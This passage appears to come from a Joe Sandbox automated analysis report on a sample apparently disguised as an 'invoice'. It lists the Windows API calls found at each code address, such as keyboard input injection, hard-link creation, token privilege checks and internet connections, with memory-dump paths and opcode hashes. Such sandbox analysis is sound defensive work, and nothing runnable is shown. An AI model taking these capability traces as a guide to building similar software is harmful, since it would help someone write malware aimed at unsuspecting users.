                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0100F910), ref: 00FF65BD
                        • _strlen.LIBCMT ref: 00FF65EF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID:
                        • API String ID: 4218353326-0
                        • Opcode ID: 73a52ad12f31f152354c1178f4fcb0848d28f9fd26cf4908013c9bc27a7affd4
                        • Instruction ID: d7b7f14ff5a677bec479735fb4ff073024b25cc2e759375d4b8479f74ccbc236
                        • Opcode Fuzzy Hash: 73a52ad12f31f152354c1178f4fcb0848d28f9fd26cf4908013c9bc27a7affd4
                        • Instruction Fuzzy Hash: D941B131A00108ABCB14FBA4ECD5EBEB3A9AF44310F188155F515DB2A2DF39AD00EB50
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FEB92A
                        • GetLastError.KERNEL32(?,00000000), ref: 00FEB950
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FEB975
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FEB9A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 1c626b099aa509a3adc2206682805e50330e2ae31e55fc9466ff429e614e119b
                        • Instruction ID: 547a5a8638d5d09d130e780def8bfd2cd7d637984ee40036e264802d47f1f372
                        • Opcode Fuzzy Hash: 1c626b099aa509a3adc2206682805e50330e2ae31e55fc9466ff429e614e119b
                        • Instruction Fuzzy Hash: 46412D39600651DFCB11EF15C484A6DBBF1EF49324B098088ED8A9B762CB79FD01EB91
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01008910
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: a6f14d4cc56d686cc481f96514e78c27f9b5765fccfce2975ef352a55705bdb2
                        • Instruction ID: 36cf3f50df54e40abea50f79afbde8e6b811b8ec6ef662a99e6f547de2b953f5
                        • Opcode Fuzzy Hash: a6f14d4cc56d686cc481f96514e78c27f9b5765fccfce2975ef352a55705bdb2
                        • Instruction Fuzzy Hash: 7D31C374A01108BFFF77AA58DC84BAC3BA5FB05310F188157FAD1E62D1C735A6808B52
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 0100AB92
                        • GetWindowRect.USER32(?,?), ref: 0100AC08
                        • PtInRect.USER32(?,?,0100C07E), ref: 0100AC18
                        • MessageBeep.USER32(00000000), ref: 0100AC89
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 3f7380b7a74b8731cba73f8408f1f10f805bfdfc95cfb47773048f703501431a
                        • Instruction ID: ce1c4f7e80d07d52cea6c9540c0054fa3957f681b3d38aec6048c84f83129b7a
                        • Opcode Fuzzy Hash: 3f7380b7a74b8731cba73f8408f1f10f805bfdfc95cfb47773048f703501431a
                        • Instruction Fuzzy Hash: 14419F74B00619DFEB23CF58C984F997BF5FB48300F1981A9E9949B295C735E441CB50
                        APIs
                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FE0E58
                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FE0E74
                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FE0EDA
                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FE0F2C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                        • Instruction ID: 7ff9fc4f2541308ed99d74b38d7dbd985b35f79642ae8aab38e6b24d528f5d0a
                        • Opcode Fuzzy Hash: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                        • Instruction Fuzzy Hash: 7F313731D402C8AEFB35CA268C05BFA7BA9EB58320F18462AF1D0521D1CBF98DD5B755
                        APIs
                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00FE0F97
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FE0FB3
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FE1012
                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00FE1064
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                        • Instruction ID: 60ed2e5a8cd3cebd8d26980edb6927f9879293d24dc1dcee9087058e9a00ccdb
                        • Opcode Fuzzy Hash: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                        • Instruction Fuzzy Hash: 05313A30E402C8DEFF358A278C08BFABBA6BB49331F04421AE595521D5C7B98DD5B761
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB637B
                        • __isleadbyte_l.LIBCMT ref: 00FB63A9
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB63D7
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB640D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 6bc96badfb199e9edf6847bafb22bdd2c8d053f81b50f9805ec1684fb913bcb8
                        • Instruction ID: 99b46c81f8869f758052d028a9d9677569d5a4b8e6c4fc15c88518dbfc68dcdf
                        • Opcode Fuzzy Hash: 6bc96badfb199e9edf6847bafb22bdd2c8d053f81b50f9805ec1684fb913bcb8
                        • Instruction Fuzzy Hash: 56319C31A04246EFDB21CF66CC84BAA7BE5FF41320F194029E864C7291EB39D851EF60
                        APIs
                        • GetForegroundWindow.USER32 ref: 01004F6B
                          • Part of subcall function 00FE3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE369F
                          • Part of subcall function 00FE3685: GetCurrentThreadId.KERNEL32 ref: 00FE36A6
                          • Part of subcall function 00FE3685: AttachThreadInput.USER32(00000000,?,00FE50AC), ref: 00FE36AD
                        • GetCaretPos.USER32(?), ref: 01004F7C
                        • ClientToScreen.USER32(00000000,?), ref: 01004FB7
                        • GetForegroundWindow.USER32 ref: 01004FBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 41fd78ba15c335e71a42353ea8dfe40e530cf964b7562f1be19d1fa8ce989d0a
                        • Instruction ID: a6c2d73029c48078373171d4a65ed02ccb19bba453c3242c9ad25f51d38a12d6
                        • Opcode Fuzzy Hash: 41fd78ba15c335e71a42353ea8dfe40e530cf964b7562f1be19d1fa8ce989d0a
                        • Instruction Fuzzy Hash: 00312B72900108AFDB14EFB5CC859EFB7F9EF88304F14406AE546E7241EA799E01DBA1
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • GetCursorPos.USER32(?), ref: 0100C53C
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FBBB2B,?,?,?,?,?), ref: 0100C551
                        • GetCursorPos.USER32(?), ref: 0100C59E
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FBBB2B,?,?,?), ref: 0100C5D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 41ba5745f8e2a61339ffea00fadb8a694a151738fbbea19740f25b8a33b5c8fe
                        • Instruction ID: 3ce3877cc9f1a5fea8ffebe6a8c06f88983aba4050837da46260e837f4129aae
                        • Opcode Fuzzy Hash: 41ba5745f8e2a61339ffea00fadb8a694a151738fbbea19740f25b8a33b5c8fe
                        • Instruction Fuzzy Hash: 4231E539100118EFFB22CF58C998EEA7BF5EB49311F0441D9FA858B2D1D7369990DBA0
                        APIs
                          • Part of subcall function 00FD8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8449
                          • Part of subcall function 00FD8432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8453
                          • Part of subcall function 00FD8432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8462
                          • Part of subcall function 00FD8432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8469
                          • Part of subcall function 00FD8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD847F
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FD89CB
                        • _memcmp.LIBCMT ref: 00FD89EE
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FD8A24
                        • HeapFree.KERNEL32(00000000), ref: 00FD8A2B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: 5b4fc2f3846d95b6a550a1a276760ebb0c41a2de57f60db4663df108e73b27ac
                        • Instruction ID: 6e3d54849222e754d9386993c9d8029f5f92b3dbeda2db390c2316eba0fade15
                        • Opcode Fuzzy Hash: 5b4fc2f3846d95b6a550a1a276760ebb0c41a2de57f60db4663df108e73b27ac
                        • Instruction Fuzzy Hash: 3B21AE72E40109BFDB10DFA4C945BEEBBB9EF40391F09405AE494A7340DB35AA06EF51
                        APIs
                        • __setmode.LIBCMT ref: 00FA0B2E
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE793F,?,?,00000000), ref: 00F85B8C
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE793F,?,?,00000000,?,?), ref: 00F85BB0
                        • _fprintf.LIBCMT ref: 00FA0B65
                        • OutputDebugStringW.KERNEL32(?), ref: 00FD6111
                          • Part of subcall function 00FA4C1A: _flsall.LIBCMT ref: 00FA4C33
                        • __setmode.LIBCMT ref: 00FA0B9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                        • String ID:
                        • API String ID: 521402451-0
                        • Opcode ID: 6c482d66c315328cf39361344e4862da74be188ba4fd1b4122829c3fadf9f4ba
                        • Instruction ID: 6e5016daed530ad4f649094f491a4f3fb9c956d21d21b32265ed8f0033c04015
                        • Opcode Fuzzy Hash: 6c482d66c315328cf39361344e4862da74be188ba4fd1b4122829c3fadf9f4ba
                        • Instruction Fuzzy Hash: D4113AB29042047FDB04B7B4AC47DFE7B6D9F83320F14001AF11897282DEAD684277A5
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FF18B9
                          • Part of subcall function 00FF1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF1962
                          • Part of subcall function 00FF1943: InternetCloseHandle.WININET(00000000), ref: 00FF19FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Internet$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 1463438336-0
                        • Opcode ID: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                        • Instruction ID: 8f1a269c0d4257038378d2c61bc3f47f3b8e973f5574fae8f248527849feedf4
                        • Opcode Fuzzy Hash: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                        • Instruction Fuzzy Hash: BE21A176600609FFEB229F608C10F7AB7ADFF88710F14401AFB5596660DBB5D811B7A1
                        APIs
                        • GetFileAttributesW.KERNEL32(?,0100FAC0), ref: 00FE3AA8
                        • GetLastError.KERNEL32 ref: 00FE3AB7
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE3AC6
                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0100FAC0), ref: 00FE3B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast
                        • String ID:
                        • API String ID: 2267087916-0
                        • Opcode ID: e9a9caf0e5df969df8617f0c32ddbbc0b6bde47ceb8baf220bc00a581ec3e6f9
                        • Instruction ID: ca7322375f0ae8f4d8bf43242bbec19ce939789f7069d91eb56f6f786d89ad80
                        • Opcode Fuzzy Hash: e9a9caf0e5df969df8617f0c32ddbbc0b6bde47ceb8baf220bc00a581ec3e6f9
                        • Instruction Fuzzy Hash: 7421E7749083419F8310EF25C88899BB7E4EF85B24F144A1DF49AC7291E735DE45EB82
                        APIs
                        • _free.LIBCMT ref: 00FB5281
                          • Part of subcall function 00FA588C: __FF_MSGBANNER.LIBCMT ref: 00FA58A3
                          • Part of subcall function 00FA588C: __NMSG_WRITE.LIBCMT ref: 00FA58AA
                          • Part of subcall function 00FA588C: RtlAllocateHeap.NTDLL(014F0000,00000000,00000001,00000000,?,?,?,00FA0F53,?), ref: 00FA58CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: be762b508e5a18c247dc76c3ac28a48e93b8aa4464e1adf2ddc7bbab5a4ef769
                        • Instruction ID: 13f230159d9cce80a9b66f459b759a1bdf0f1d947987342bf453cb2b1ed71066
                        • Opcode Fuzzy Hash: be762b508e5a18c247dc76c3ac28a48e93b8aa4464e1adf2ddc7bbab5a4ef769
                        • Instruction Fuzzy Hash: 5E110A72E02A169FCB312FB5AC0579E3798AF06BB0F204529F9449A181DE7D8D41BF60
                        APIs
                        • _memset.LIBCMT ref: 00F84560
                          • Part of subcall function 00F8410D: _memset.LIBCMT ref: 00F8418D
                          • Part of subcall function 00F8410D: _wcscpy.LIBCMT ref: 00F841E1
                          • Part of subcall function 00F8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F841F1
                        • KillTimer.USER32(?,00000001,?,?), ref: 00F845B5
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F845C4
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FBD5FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                        • String ID:
                        • API String ID: 1378193009-0
                        • Opcode ID: 379f30f58ff74eaf5a9b089f52d1355afc1c0d1142503515fee5c0215c098eb4
                        • Instruction ID: b2f9418b5095f05593ff63cb59da107dd130978439f4e1f1cf7a8612dc236790
                        • Opcode Fuzzy Hash: 379f30f58ff74eaf5a9b089f52d1355afc1c0d1142503515fee5c0215c098eb4
                        • Instruction Fuzzy Hash: 9F210EB19047849FEB339B34C855BEBBBECAF01318F08009EE6CD5A145D7756984EB52
                        APIs
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE793F,?,?,00000000), ref: 00F85B8C
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE793F,?,?,00000000,?,?), ref: 00F85BB0
                        • gethostbyname.WSOCK32(?), ref: 00FF64AF
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF64BA
                        • _memmove.LIBCMT ref: 00FF64E7
                        • inet_ntoa.WSOCK32(?), ref: 00FF64F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 1504782959-0
                        • Opcode ID: 06eaff34df81e5e589e2572fd24eed564469fe814809033d714f699b2ffb9ff1
                        • Instruction ID: 3d3206489801ad60ab18ee59897dbed4f43af6e949f1dd9ec5e5673037f07a3a
                        • Opcode Fuzzy Hash: 06eaff34df81e5e589e2572fd24eed564469fe814809033d714f699b2ffb9ff1
                        • Instruction Fuzzy Hash: 96116D36900109AFCB15FBA4DD86DEEB7B8BF44710B184065F602A7261DF39AF05EB61
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD8E23
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8E35
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8E4B
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8E66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                        • Instruction ID: ab34938d5976a258e7ee8f21b78b062493dc3352e1ee7c78b179e892dc750cf5
                        • Opcode Fuzzy Hash: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                        • Instruction Fuzzy Hash: EA114C79900218FFDB11DFA5CC85E9DBB79FB48750F204096E900B7250DA716E11EB90
                        APIs
